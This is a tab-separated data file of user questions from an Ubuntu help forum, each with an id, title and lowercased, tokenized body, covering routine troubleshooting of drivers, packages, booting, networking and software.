493317	ubuntu 12.04 login returns me to login manager , how to diagnose ?	this started with me adding a graphics card to my system . when i booted up , ubuntu complained that the graphics config had changed , and gave me a terminal session . i copied /etc/x11/xorg.conf.failsafe to xorg.conf , and that gave me the standard graphical login manager . nw , when i try to log in the screen goes blank for a second , then returns me to the login manager . it tells me when i give it a deliberately bad password , so i know i 'm authenticating . when i go across to a virtual terminal , i find that nothing in my homedir has been modified , except for ~/.dmrc if i 've tried a different login mode . ras a result , my usual resort of consulting ~/.xsession-errors is unavailable . other accounts like `` guest session '' are able to log in without problems , just mine fails . i have tried moving my ~/.xsession and ~/.xsessionrc to ~/xsession { , .rc } .bak , no effect . i 've looked at /var/log/ { syslog , auth.log , kern.log , xorg.0.log } , and nothing interesting appears there when i try to log in ... i 've tried all the suggestions in the following earlier questions : login returns to login screen where should i look to diagnose login freezing ? ca n't log in to ubuntu 12.04 what else can i try to diagnose this ? i think for now , i am going to work from a different account , but that is going to be a bit of a hassle .
493318	resset password bittorrent sync	i 've installed bittorent sync . but typed the password wrong.. how can i resset the password of bittorent sync ? ofc on ubuntu
493319	python scripting - how to execute linux commands ?	i have to do a bunch of file copying , moving , svn check out commands , directory checking etc . and i 'm trying to make a script to do it for me . i have basic python syntax , but i 'm not sure how to use python to execute linux commands . i know the linux commands needed for example sudo apt-get install subversion i just do n't know how to wrap python around it . specifically , could anyone give examples on how to : check if a package ( like svn ) is installed , if not then install it . i know this is a simple if-statement but no idea how to write it ... check if a folder with a specific name is installed , if not create it on the desktop/some other directory . similar to the above i would assume . move to a certain directory and execute a command ( like i want to extract a .tgz file in a certain directory ) there 's more but i want to grasp basic principles and actually learn how to execute linux commands using python scripting . thanks for your time~ edit : i am specifically required to use python
493320	cant put ubuntu on my galaxy nexus !	so i followed the proper steps to install ubuntu on my nexus at the websight provided http : //developer.ubuntu.com/start/ubuntu-for-devices/installing-ubuntu-for-devices/ but when i get to actually putting it on the phone under the `` install ubuntu on device '' menu i typen it in and all i get is $ ubuntu-device-flash -- channel=devel -- bootstrap 2014/07/08 13:28:14 expecting the device to be in the bootloader ... waiting 2014/07/08 13:28:17 device is |tuna| 2014/07/08 13:28:17 device tuna not found on server https : //system-image.ubuntu.com channel devel does anyone know why this is happening ?
493322	dpkg dependency error , even when said dependency is installed	i 'm trying to install some software on ubuntu 14.04 ( blackmagic desktop video version 10.1.1 ) . my command is : dpkg -i < packagefilename > .deb i get the following error : preparing to unpack desktopvideo_10.1.1a26_i386.deb ... unpacking desktopvideo ( 10.1.1a26 ) ... dpkg : dependency problems prevent configuration of desktopvideo : desktopvideo depends on dkms . desktopvideo depends on linux-headers-686-pae | linux-headers-2.6-686 | linux-headers-amd64 | linux-headers-2.6-amd64 | linux-headers-generic | linux-headers . however , when i check in my package manager ( synaptic ) it says i have dkms and linux-headers-generic installed . if i do an apt-get install on them it says i 'm up to date . what 's going on ?
493324	how to reinstall mac os x 10.9 ?	first , here 's what happened : i had os x mavericks ( 10.9 ) installed on my macbook pro . then i wiped the operating system to get windows 7 instead . after that , i went to install ubuntu 12.04 , but while installing , it wiped windows 7 as well . now i 'm looking to reinstall mac os x , but i ca n't edit the partitions to create unallocated space , because it is stored in the ext4 partiton , mounted at `` / '' . any help would be appreciated . edit : when i try to boot from any device ( disk/usb/sd ) this message shows up twice [ error : efidisk read error . ]
493325	in this script , ~ is /root/ . how to be in /home/name-of-the-user/ ?	# ! /bin/bash # become root uid= $ ( id -u ) if [ x $ uid ! = x0 ] then printf -v cmd_str ' % q ' `` $ 0 '' `` $ @ '' exec sudo su -c `` $ cmd_str '' fi mkdir ~/.d3go/ ; cp -a `pwd`/viewright_backup/ . ~/.d3go/ ; mkdir /opt/d3go/ ; cp `pwd`/d3go /opt/d3go/ ; cp `pwd`/d3go.png /opt/d3go/ ; cp `pwd`/d3go.desktop /usr/share/applications/ ; chmod +x /opt/d3go/d3go ; as you can see , because this uses ~ , and the script is ran as root , it creats the folder.d3go in the /root/ directory . is it possible to create it in the home directory . for example , if the script is located in /home/user/downloads/ , it should create the directory in home/user/ . if it 's located in /home/user2/downloads/dir/ , it should create it in /home/user2/ etc . is this possible ? thanks ! maybe something like : # ! /bin/bash # remember the username user = $ ( whoami ) ; # become root uid= $ ( id -u ) if [ x $ uid ! = x0 ] then printf -v cmd_str ' % q ' `` $ 0 '' `` $ @ '' exec sudo su -c `` $ cmd_str '' fi mkdir /home/`echo user`/.d3go/ ; cp -a `pwd`/viewright_backup/ . /home/`echo user`/.d3go/ ;
493327	why has my keyboard change layout settings ?	i 'm running ubuntu 14.04 with my keyboard set to the uk layout . it 's worked fine for the past few months but today it seems to enter characters from the us keyboard layout ( ie @ instead of `` ) . i thought maybe it was simply that the keyboard layout settings had been reset from an update or something . but when i go to settings > text entry - the only keyboard configuration i have is english ( uk ) . if i go to the keyboard layout chart all of the keys seem to be correctly located . where are the files where these settings are kept and how can i edit them if they turn out to be wrong ? i have no idea why this would have changed . the only thing i can think of is that in software & updates i selected other ... and told it to find the best server as i have recently changed location . it set my update location to server in hong kong .
493328	problems with graphics drivers on latitude d600 running 14.04	this is my first time installing ubuntu on a laptop , which is the dell latitiude d600 . i have been having a very specific issue related to what might be the graphics driver , but i am not completely sure . the problem arises after the desktop environment loads up and everything appears to be working normally , but when i try to open any window , the window opens and closes in slow motion and the ubuntu boot logo is all messed up/inverted colors . i have been searching forumns far and wide for the fix and have tried several different solutions including switching to the gnome classic desktop , installing fglrx for it 's 3d driver , and a weird solution involving using the boot flag video=lvds-1 : d. installing the classic desktop presents no improvement with the problem at all , fglrx appears to fix the problem with the boot logo , but after i log in to unity or gnome , the default background is displayed with no desktop evironment loading at all , and it just stays like that , and finally , the boot flag option causes the screen to go black and stay black after boot . it is easy to see how this problems is extremely frustrating , and if anyone here could provide me any help at all it would be greatly apreciated , if you need any extra information about the laptop , all the hardware i believe is the factory hardware except a ram upgrade ( 2gb ) and a 20gb hard drive . thanks . update : i believe i have figured out the problem , i have a radeon 9000 chip and unity runs very slowly on these chips and there is no real fix for it aside from installing xubuntu or lubuntu .
493338	repeating i/o error notification	i 'm downloading some old irish songs ( using qbittorrent ) but the names can get quite lengthy at times . ( do n't worry , there is no copyright on these songs ) now a few files have a file name that is just to long . they produce an error . now this error is simple to fix but the problem is that this i/o error notification repeats about 50/60 times before moving on to the next file with a quite lengthy file name . is there a way to fix error notifications from piling up like that in a short amount of time ( or to reset these piled up notifications if they do happen ) ? ? edit : the file names exceed 255 bytes from time to time . i fixed that by setting a standard solution of renaming the file with a ~ symbol if it tries to exceed this limit . this is not the problem . the problem is the ( almost ) endless repeat of the same error messages when they have already been fixed .
493339	ubuntu 14.04 lts mouse flickering	i have an hp elitebook g1 laptop plugged in to an hp docking station . i also have two acer 22 '' monitors plugged in to the hp docking station . i just got done installing ubuntu 14.04 lts and the mouse flickers and sometimes disappears . this is driving me nutz ! here is the solution that i 've found from all other posts - > open system settings > displays . in the displays window , you will see an unknown monitor . click it and disable it.ďťż the problem is that i do n't have `` unknown monitor '' on my display screen to un-check . another problem that i am seeing is that once 22 '' monitor is showing 1680x1050 and the other is 1280x800 and wo n't increase in screen resolution . any ideas ?
493343	changing text of system menus	how would that be possible ? like changing text on `` log in '' button to something like `` vafeles '' or changing control panel options to something obscure like `` laikaveräˇis '' ?
493344	making the text caret fade in and out	quick question , is it possible to have the blinking caret when typing to smoothly fade in and out rather than having a hard blinking animation ? thanks
493347	problems changing plymouth boot screens for live usb	i am trying to create a very simple tool on a usb stick . i have created a ubuntu live cd that boots up does a sudo fsck -y /dev/sda1 and then does a sudo shutdown -h now to perform a simple disk repair . i am now trying to modify the plymouth boot screens to inform the user of the tool what is happening . i have tried various things using the ubuntu customization kit and casper/initrd.lz to do this along with various posts i have gotten for the web , but i always end up with a live image without my changed plymouth script or an image that will not boot ( kernel panic ) . does anyone have clear directions on how i can accomplish ? i am a fairly novice ubuntu user . by the way , i am pretty sure my new plymouth script works because i have it running on my regular ubuntu installation and it does exactly what i want it to do . thanks in advance , doug
493348	non-sudo wifi deactivation	i have asus n76vb laptop . i am affected by this bug in asus_nb_wmi driver , so i ca n't use fn-f2 key combination to toggle wifi . the guy from the thread about bug workaround uses rfkill command to block and unblock wifi in his toggling script . rfkill , however , needs root-access to execute these commands , so if i want to assign a hotkey to this script , i 'll have to add rfkill to sudoers list , which i want to leave as an ugly , emergency-way idea . so i want to know if i can disable my wifi module without gaining root-access . pretty dbus-send commands appreciated ; )
493353	publish generated key to launchpad	i created a new local pgp key but i dont find how to publish it so launchpad will recognize it . all explanations are only in english but in my german ubuntu i can not find the tools under those names : https : //launchpad.net/~ubuntu-spacetrace/+editpgpkeys
493356	can i make menus never dissaper ?	when you start application menus ( file , edit , view , etc ... ) disappear and applications title replaces them . can i disable this feature and make sure that menus never disappear ?
493358	how to install ubuntu 14.04 alongside windows 8.1	i have tried many methods to install ubuntu 14.04 alongside windows 8.1 but none of the methods worked . i receive the error message that says `` no operating system detected '' .
493359	how to install huawei ec315 mts mblaze data card in ubuntu 14.04 lts	i have bought mts mblaze data card which is huawei ec315 but i am not able to install it in my ubuntu 14.04 . please help . regards , sudhir
493365	are there any good application for making documentation availbable in the apt repository ?	i 'm looking for a program to create source code and project documentation . it needs to support code snippets , tables , indexing , export to html and pdf , and latex support would also be a plus . it turns out that a search including the words code and documentation turn up a lot of irrelevant results so i though i would ask here .
493369	distribute `` home '' in 2 hard disks	i have 2 hard disks : a ssd and a normal . i want to install / and /home on ssd disk and /home/user/documents , /home/user/images , /home/user/music and /home/user/videos on normal disk . how can i do this ?
493370	heat charm fails to authorize image	posted a similar question on openstack , https : //ask.openstack.org/en/question/35227/heat-fails-on-image-authorization/ , as i am not sure if this is an issue with heat or charm setup . after adding heat charm tried deploying a simple image , following http : //docs.openstack.org/icehouse/install-guide/install/apt/content/heat-install.html . however , i am getting the following error : http : //pastebin.ubuntu.com/7767857/ . i 've looked at similar reported errors in openstack , and suggested solutions do n't seem to be applicable , i.e. , charm seems to have set up api-paste.ini and heat.conf , properly . as a reference , here are api-paste.ini , http : //pastebin.ubuntu.com/7767867/ , and heat.conf , http : //pastebin.ubuntu.com/7767869/ . ithis is a multi-node setup and neither keystone nor glance log files indicate any errors . any and all suggestions are welcomed .
493371	ubuntu software center not installing app	i have an app published in ubuntu software center ( https : //apps.ubuntu.com/cat/applications/extract-email/ ) that users constantly complain of install problems , it seems a store bug , because the app works fine . after they buy the problem they can not install it . what is happening ? what should i do ? i can not find anywhere a place to get support from ubuntu to solve this problem .
493373	wine corrupted , stream libraries , everything ?	i ca n't remove wine at all , i can not sudo apt-get remove , purge , or autoremove without error.i 've tried removing the /usr/bin/wine files , everything . i am at a complete loss , as every suggestion i 've tried to google search results in failure . i 've also done sudo apt-get update followed by sudo apt-get -f install i get the following error : 3 not fully installed or removed . need to get 0 b/15.7 mb of archives . after this operation , 0 b of additional disk space will be used . dpkg : dependency problems prevent configuration of wine1.6 : wine1.6 depends on wine1.6-i386 ( = 1:1.6.2-0ubuntu4 ) ; however : package wine1.6-i386 is not installed . dpkg : error processing package wine1.6 ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing package wine1.6-i386 ( -- configure ) : no apport report written because the error message indicates its a followup error from a previous failure . package wine1.6-i386 is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : dependency problems prevent configuration of wine1.6-amd64 : wine1.6-amd64 depends on wine1.6 : any ( = 1:1.6.2-0ubuntu4 ) ; however : package wine1.6 is not configured yet . dpkg : error processing package wine1.6-amd64 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm thinking it may be best just to re-install ubuntu at this point . any suggestions would be helpful .
493375	lenovo s430 fancontrol problems	earlier today i noticed my laptop getting quite hot . the first reaction was to make sure nothing was clogging the laptop , and since there wasnt i started looking into getting some fan control for the laptop . it should be noted that my laptop has 2 fan speeds at the moment , there is on battery power where , unless loaded the fan is off , and then on ac where it seems to be on a single speed constantly no matter the temperature . so i want to find a way to control the fanspeed according to temperature like you can in windows . i found lm-sensors and fancontrol . but have encountered a problem . the sensors command , after running the sudo sensors-detect only shows the following : hagelund @ hagelund-thinkpad-edge-s430 : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +29.8°c ( crit = +100.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +49.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +44.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +49.0°c ( high = +87.0°c , crit = +105.0°c ) thinkpad-isa-0000 adapter : isa adapter fan1 : 0 rpm ( low temp atm , since it is doing nothing ) since i can hear the fan spinning , im sure it is not supposed to be at 0 rpm , so either it is reading the fan speed wrong , or it has gotten hold of some phantom fan . i am using a lenovo s430 as stated in title . i been searching around a little , and i cant seem to find a straight answer for something like this . is it a bug that can be fixed , or do i have to live with my fan on all the time , at 1 speed . does anyone have experience with their fan not showing up/reading a wrong speed ?
493376	create an association in the folders option control panel	i downloaded ubuntu , and get the message `` this file does not have a program associated with it for performing this action . create an association in the folders option control panel . i have tried adding iso , but that did n't work . how should i create the association ? thanks for your help .
493377	how do i enable mouse momentum after release in kde/gnome/unity ?	i mostly use kde , and i 've loved it but i recently tried an hp laptop with all the synaptics suite and i played with it a bit and tried the mouse momentum feature , where the cursor continues after releasing the trackpad . i 'm hooked , i want that feature in kde if it means paying for it , i seriously found it to be such an aesthetically pleasing feature that there is no way i want to just deal with not having it . can someone either tell me how i can get the same thing natively or how to port/hack-onto-my-system synaptic configure tool/whatever ?
493380	what size should swap partition be if i want to hibernate later ?	since i 'm installing ubuntu for the first time ever ( please do n't shoot ) i have no idea how large the swap partition should be . on the one hand , i know that people recommend `` double the ram unless it makes swap larger than 2gb '' , but i also know that to hibernate i need swap=ram ... i have 4gb of ram . should i make my swap partition 4gb also , to be able to hibernate later ? note : the last time i contemplated installing ubuntu was when 12.04.4 was new-ish , so my information might be out of date .
493381	pulseaudio : setting a default sink for created sink inputs	from what i can tell , each time youtube loads a new video , it changes the index of the sink input that it uses , or creates a new sink input to use for that new video and trashes the old one . the default sink i want to use is sink 3 , but it always uses sink 2 , despite the default sink being set to 3 ( there 's an asterisk next to sink 3 in `` pacmd list-sinks '' ) . i constantly have to call `` pacmd move-sink-input [ index ] 3 '' each time i load a new video . do y'all know a way to get the default sink to use sink 3 always ? thanks !
493385	ubuntu bootfailure	i have ubuntu version 1.99 powered by dell and i was using it one day and all of a sudden it shut down and i have n't been able to boot it back up . when i turn it on in generic mode , it just shows a black screen with an underscore flashing . any idea why this is happening and how i can fix it ?
493390	minecraft freezes on orcale java but not openjdk	so when i updated from 13.04 to 14.04 lts ( i do a clean reinstall of the new ubuntu version ) and did minecraft on the first time using orcale java . when i started to launcher it froze ubuntu up and needed a restart ( it really annoying ) . but when i tryed openjdk problem solved . but i need orcale jvm to use flare hacked client . i tried it already on openjdk it just got me a blank screen when i use a hacked client even nodus . i have notice that if i close all of the programs that are running it works . but when a program starts automatically ( usually background process ) it will freeze and it usually half to restart the computer again ( did i say it was annoying ? ) so yea please help btw linux is the new windows
493392	the package libpam-systemd needs to be reinstalled	every time i go into the system , i have red circle with a line through it up the top of my screen . if i click on that symbol i get a message : an error occurred . please run package manager from the right click menu or run apt-get in a terminal to see what is wrong . the error message was : 'unknown error : '' ( e : the package libpam-systemd needs to be reinstalled , but ca n't find an archive for it . ) ' this usually means that your installed packages have unmet dependencies apt-get does n't seem to run properly either ! any help much appreciated .
493393	how to print via router ?	hello i 'm new to ubuntu and i want to know how can i print files using a printer connected to a router via usb . printer : canon pixma mp210 router : tp-link wr1042nd i already done that some time ago but i ca n't find the tutorial anymore ... i remember the steps but i ca n't remember the host what i did was to try to add a printer by going to system settings - > printers - > add - > network printer - > find network printer but i ca n't remember what is the host my router 's ip is 192.168.0.1 i searched on google for the past 2 hours without luck and it 's driving me crazy because when i did it last time i did everything in less than 5 minutes
493395	why grub-reboot stays at the boot-once system ?	i have two linux systems installed on one machine . they share one /boot partition and are pretty much the same . from one system ( a ) , i use grub-reboot to boot to the other system ( b ) , or vice-versa . this is done well . but the problem is , the next boot does not return back . so it is like : a -- > grub-reboot , reboot -- > b -- > reboot -- > b ... and staring from b is the same situation . so what could go wrong , how to debug it ? thanks a lot !
493396	software update error : package operation failed	whenever i 'm prompted to install software updates , i get the error : the installation or removal of a software package failed . when i run sudo apt-get update & & sudo apt-get upgrade this is what the terminal displays : 52 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 1 not fully installed or removed . need to get 0 b/54.7 mb of archives . after this operation , 55.3 kb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % preconfiguring packages ... setting up apt ( 0.9.9.1~ubuntu3.2 ) ... error : ca n't find the archive-keyring is the ubuntu-keyring package installed ? dpkg : error processing apt ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : apt e : sub-process /usr/bin/dpkg returned an error code ( 1 ) delia @ delia-inspiron-1764 : ~ $ i would appreciate any suggestions/help ! thank you ! !
493397	dual boot install of trusty ubuntu on an hp with windows 8 ( 64 bit ) pre-installed ( uefi supported )	yes , i have read , many times , `` installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) , '' and i have read the `` uefi '' piece with the subtitle `` installing ubuntu quickly and easily via trial and error . '' i have learned much from these pieces , but i 'm still too much of a newbie to make it all work . i have an hp15 notebook with windows 8.1 ( 64 bit ) pre-installed . the chip is intel pentium cpu n3520 @ 2.16 ghz . ram is 4gb . i wish to keep windows 8.1 and have ubuntu 14.04 dual boot with it . the steps i 've taken : i changed the boot order in bios to enable booting to the usb . i have ubuntu on a usb , and i have toured it on that device . when i tried to install ubuntu on the hd , i did not get the option of installing it along with windows . i turned off fast startup in win8 . i disalbed hibernation in win8 . in win8 disk management i noticed that the partitions are these : 400 mb ( recovery partition ) 260 mb ( efi system partition ) 678.58 gb ntfs windows ( c : ) 19.28 gb ntfs recovery ( d : ) ( oem partition ) shut down . in win 8 's disk management i created 300 gb unalloated partition by shrinking c : . the partition is gpt . the other partitions seem to be ms-dos . based on my understanding of the above articles , i leave uefi enabled/installed , and i leave secure boot enabled . on this machine esc f10 gets one into bios . ( esc f2 gets one into uefi . ) 8 booted up in the usb , using the try ubuntu without installing . set up internet connection . tried to install ubuntu on hd . did not get the option to install alongside windows . at this point i guess i 'm supposed to use the `` something else '' option , but unless it takes me through step-by-step , i 'm afraid of screwing things up . here is what the bios currently has : legacy support is disabled secure boot is enabled uefi boot order is usb diskette then os boot manager , then other options ( many years ago i did this with mepis and had no trouble ( : - ) . ) many thanks .
493398	very long time start ubuntu after install nvidia	after installing nvidia after reboot it take to show the login almost 10 minutes , i found reading to review the log , but do not understand it to be , i see these lines there is something unusual as it goes a long time . from 11 to 532. as i can do to not delay so long to start . [ 11.217 ] ( ** ) nvidia ( 0 ) : nvidia sli disabled . [ 11.217 ] ( ** ) nvidia ( 0 ) : nvidia multi-gpu disabled . [ 11.217 ] ( ** ) nvidia ( 0 ) : option `` metamodes '' `` vga-0 : nvidia-auto-select +0+0 , lvds-0 : null '' [ 11.217 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 532.201 ] ( ii ) nvidia ( 0 ) : display ( dell u2412m ( crt-0 ) ) does not support nvidia 3d [ 532.201 ] ( ii ) nvidia ( 0 ) : vision stereo . [ 532.201 ] ( ii ) nvidia ( 0 ) : display ( seiko/epson ( dfp-0 ) ) does not support nvidia 3d [ 532.201 ] ( ii ) nvidia ( 0 ) : vision stereo . [ 532.201 ] ( ii ) nvidia ( gpu-0 ) : found drm driver nvidia-drm ( 20130102 ) [ 532.204 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 525m ( gf108 ) at pci:1:0:0 ( gpu-0 ) [ 532.204 ] ( -- ) nvidia ( 0 ) : memory : 1048576 kbytes [ 532.204 ] ( -- ) nvidia ( 0 ) : videobios : 70.08.54.00.0b [ 532.204 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 532.210 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 525m at pci:1:0:0 [ 532.210 ] ( -- ) nvidia ( 0 ) : dell u2412m ( crt-0 ) ( connected ) [ 532.210 ] ( -- ) nvidia ( 0 ) : seiko/epson ( dfp-0 ) ( boot , connected ) [ 532.210 ] ( -- ) nvidia ( 0 ) : dfp-1
493400	the disk drive for /tmp is not ready yet ?	i installed ubuntu 14.04 by uninstalling ubuntu 12.04 ( which is in wubi ) . after installation when the system is rebboting again i am getting this message '' the disk drive for /tmp is not ready yet '' `` continue to wait , press s to skip or m to manually recover '' .i read some solutions i.e to replace temp_old file and mount drives etc . but they didnt work . so i totally removed ubuntu.please help me out..
493403	ip address setting with rtnetlink	i set ip address with a program using rtnetlink.h . it seems to work when i checked it through ifconfig command . but , when i check network manager ( gui ) after executing the program , previous ip address were there . network manager is also using rtnetlink.h right ? here is the code i used . please comment . # include < arpa/inet.h > # include < linux/if_addr.h > # include < linux/if_link.h > # include < linux/netlink.h > # include < linux/rtnetlink.h > # include < sys/socket.h > # include < sys/uio.h > # include < unistd.h > # include < cstdio > # include < cstring > # define iflist_reply_buffer 8192 void newipaddr ( char dsts [ ] , int if_indx ) { struct { struct nlmsghdr nl ; struct ifaddrmsg rt ; char buf [ iflist_reply_buffer ] ; } newipreq ; int fd ; struct sockaddr_nl la ; struct sockaddr_nl pa ; struct msghdr msg ; struct iovec iov ; int ifal ; struct rtattr *rtap ; // open socket fd = socket ( af_netlink , sock_raw , netlink_route ) ; // setup local address & bind using // this address bzero ( & la , sizeof ( la ) ) ; la.nl_family = af_netlink ; la.nl_pid = getpid ( ) ; bind ( fd , ( struct sockaddr* ) & la , sizeof ( la ) ) ; // sub functions to create rtnetlink message , // send over socket , reveive reply & process // message // initalize rtnetlink request buffer bzero ( & newipreq , sizeof ( newipreq ) ) ; // compute the initial length of the // service request ifal = sizeof ( struct ifaddrmsg ) ; // add first attrib : // set ip addr // rtnetlink buffer size rtap = ( struct rtattr * ) newipreq.buf ; rtap- > rta_type = ifa_address ; rtap- > rta_len = sizeof ( struct rtattr ) + 4 ; inet_pton ( af_inet , dsts , ( ( char * ) rtap ) + sizeof ( struct rtattr ) ) ; ifal += rtap- > rta_len ; // add second attrib : // set ifc index and increment the size rtap = ( struct rtattr * ) ( ( ( char * ) rtap ) + rtap- > rta_len ) ; rtap- > rta_type = ifa_local ; rtap- > rta_len = sizeof ( struct rtattr ) + 4 ; inet_pton ( af_inet , dsts , ( ( char * ) rtap ) + sizeof ( struct rtattr ) ) ; ifal += rtap- > rta_len ; // setup the netlink header newipreq.nl.nlmsg_len = nlmsg_length ( ifal ) ; /* todo : test with nlm_f_append */ newipreq.nl.nlmsg_flags = nlm_f_request | nlm_f_create | nlm_f_append ; newipreq.nl.nlmsg_type = rtm_newaddr ; // setup the service header ( struct rtmsg ) newipreq.rt.ifa_family = af_inet ; newipreq.rt.ifa_prefixlen = 32 ; /*hardcoded*/ newipreq.rt.ifa_flags = ifa_f_permanent ; newipreq.rt.ifa_scope = rt_scope_host ; /*todo : think how can you find out the ifa_index */ newipreq.rt.ifa_index = if_indx ; // create the remote address // to communicate bzero ( & pa , sizeof ( pa ) ) ; pa.nl_family = af_netlink ; // initialize & create the struct msghdr supplied // to the sendmsg ( ) function bzero ( & msg , sizeof ( msg ) ) ; msg.msg_name = ( void * ) & pa ; msg.msg_namelen = sizeof ( pa ) ; // place the pointer & size of the rtnetlink // message in the struct msghdr iov.iov_base = ( void * ) & newipreq.nl ; iov.iov_len = newipreq.nl.nlmsg_len ; msg.msg_iov = & iov ; msg.msg_iovlen = 1 ; // send the rtnetlink message to kernel int ret = sendmsg ( fd , & msg , 0 ) ; //cout < < rtn < < endl ; // close socket close ( fd ) ; } int main ( int argc , char* argv [ ] ) { newipaddr ( `` 192.168.1.78 '' , 3 ) ; }
493404	ubuntu 14.04 + vmware 6 : left ctrl and right shift not functioning	before i launch a virtual machine in vmware , all the modifier keys function properly . even when i launch vmware , but before i start the virtual machine everything works great . however once i start a virtual machine my left ctrl and right shift keys stop functioning . they simply have no affect . here are a few observations that might lead to something : my left shift still keeps working . i mapped my caps lock to ctrl and it works properly . executing sudo setxkbmap temporarily sets everything in order . once vmware gains focus and i type something , problem comes back . problem persists even after i quit vmware . this is the first time i 'm using unity ( i have been using gnome for a long time ) and i 'm suspecting the problem is related to that . any ideas why this might be happening ?
493405	league of legends games will not start , bugsplat	i 'm trying to run league of legends on ubuntu 14.04 using play on linux . i followed this guide to install it . i 'm now using amd 's proprietary drivers ( got an hd5770 graphics card if that matters ) . i installed the drivers using ubuntu 's additional drivers program . it starts up fine , patches fine , logs in fine , i can create/join a game lobby etc . but when a game starts , no fullscreen window pops up , it 's just a little wine icon on my dock , clicking it or switching windows does n't work . after about a minute , i get a bugsplat error . when running the game with the open-source amd drivers , the game does start up , but the performance is bad , that 's why i 'm trying to install the proprietary drivers . edit : if you 're downvoting me , please tell me why . are you missing information ? am i in the wrong place ?
493407	postgresql importing from folder	i lost my ubuntu partition ( 12.04 ) and i 've installed the ubuntu 14.04 , i could save my database files from postgresql v9.1 , but now i 'm with a problem how can i import this data base and my settings to this postgresql that came with ubuntu ( 14.04 ) that is the 9.3.4 . update * i 've installed a virtualbox machine with ubuntu 14.04 and installed postgresql 9.1 , i 've copied the folder /var/lib/postgresql/9.1/main to the ubuntu_virtualbox , i could start the server ( just a tip : chown postgres : postgres 9.1 and chmod -r 700 9.1 ) and i did the pg_dump -ft database > database.tar i exported the sql file to my work ubuntu and tried to pg_restore -ft -c database.tar it show up everything that is on the file at my screen but if i run psql -l the database that i 've imported do n't appear , so i came back to the ubuntu_virtualbox and did pg_dump database > database.sql and tried to import it doing a new database and import using the phppgadmin this appeared to me . erro de sql : error : syntax error at or near `` ) '' line 1 : select count ( * ) as total from ( ) as sub ^ no bloco : select count ( * ) as total from ( ) as sub well , in virtualbox i 've edited /etc/php5/apache2/php.ini and set the configuration upload_max_filesize = 30m from 2m to 30m and i did the export again using the phppgadmin with the option data and estrcture type sql and i could import it . i 'm still testing ...
493409	is disabing secure boot needed for ubuntu 14.04 dual-boot with windows 8 uefi	i 've read some guides on dual-booting ubuntu and windows 8 , but all of the guides i have read are about older versions of ubuntu . they recommend disabling secure boot because there is a bug in the ubuntu installer that deletes the windows 8 bootloader altogether . is disabling this still necessary in ubuntu 14.04 ? can i enable it again after i am done installing ? also , on a related note , i know that disabling fast boot is needed for the installation , but after the installation is done , can i re-enable that too ?
493413	how to recover lost samsung photos ?	i deleted some photos on my samsung phone , how can i recover lost samsung photos ?
493415	xubuntu 14.04 setting primary monitors	i 'm using xubuntu 14.04 with the 331.38 drivers that i installed via the `` additional drivers '' my issue is that when ever i start up a game it starts up in the wrong monitor , to fix this i when my computer starts i set the primary monitor in the nvidia settings manager.. the only problem is every reboot it looses the setting of the primary monitor ... and i have to keep setting this every time . i notice there is no more xorg file ... so how would i fix this seeing that the display settings of xfce is not able to set `` primary monitor ''
493420	how to zoom webpages in browser ?	there is an application called browser ( webbrowser-app ) in ubuntu 14.04 . is there any way to zoom the pages which are viewed in it ?
493421	vagrant , port forwarding , and iptables	background : i am a newby learning python and django . because my machine is windows 8.1 , i installed vagrant with precise 64 . at first things were fine , then suddenly , none of my projects in the vm would show up locally . to make matters worse ( in my mind , at least ) all 3 of my browsers gave different messages . chrome said i had an 'empty response ' , firefox said 'the connection has been reset ' , and ie says 'the page can not be dsiplayed ' . i figured the problem was in vagrant because my very first django project , on windows , still comes up in the browser , and the three vagrant projects all have different database settings so it is n't the database . i went to the vagrant google group and found two similar prior questions , but both were unresolved . one suggestion there was to run iptables -l , so i did : ( fed1-venv ) vagrant @ precise64 : /vagrant/fed1 $ iptables -l fatal : error inserting ip_tables ( /lib/modules/3.2.0-23-generic/kernel/net/ipv4/ netfilter/ip_tables.ko ) : operation not permitted iptables v1.4.12 : ca n't initialize iptables table `filter ' : table does not exist ( do you need to insmod ? ) perhaps iptables or your kernel needs to be upgraded . ( fed1-venv ) vagrant @ precise64 : /vagrant/fed1 $ i do n't know what any of this means . i 've never even heard of insmod . i googled some more but i am just getting lost in the woods . i thought of just reinstalling iptables , but then i read that this is not turned on in unbuntu by default . that tells me it was n't there when the local sites were working in my browser . i also found this answer on so but when i tried it i got : vagrant @ precise64 : /home $ curl -v 'http : //localhost:80' * about to connect ( ) to localhost port 80 ( # 0 ) * trying 127.0.0.1 ... connection refused * could n't connect to host * closing connection # 0 curl : ( 7 ) could n't connect to host vagrant @ precise64 : /home $ curl -v 'http : //localhost:8000' * about to connect ( ) to localhost port 8000 ( # 0 ) * trying 127.0.0.1 ... connection refused * could n't connect to host * closing connection # 0 curl : ( 7 ) could n't connect to host vagrant @ precise64 : /home $ curl -v 'http : //localhost:8888' * about to connect ( ) to localhost port 8888 ( # 0 ) * trying 127.0.0.1 ... connection refused * could n't connect to host * closing connection # 0 curl : ( 7 ) could n't connect to host the reason i tried 8000 and 8888 is that my vagrant box has forwarded 8000 to 8888 on the host . then i found this but could n't get past the syntax error even though the first version is exactly as it was written in the answer : vagrant @ precise64 : /home $ $ ch = curl_init ( `` http : //google.com '' ) ; -bash : syntax error near unexpected token ` ( ' vagrant @ precise64 : /home $ $ ch = curl_init ( `` http : //google.com '' ) ; curl_setopt ( $ ch , curlopt_followlocation , 1 ) ; $ data = curl_exec ( $ ch ) ; print ( $ data ) ; -bash : syntax error near unexpected token ` ( ' vagrant @ precise64 : /home $ $ ch = curl_init ( `` http : //google.com '' ) ; curl_setopt ( $ ch , curlopt_followlocation , 1 ) ; $ data = curl_exec ( $ ch ) 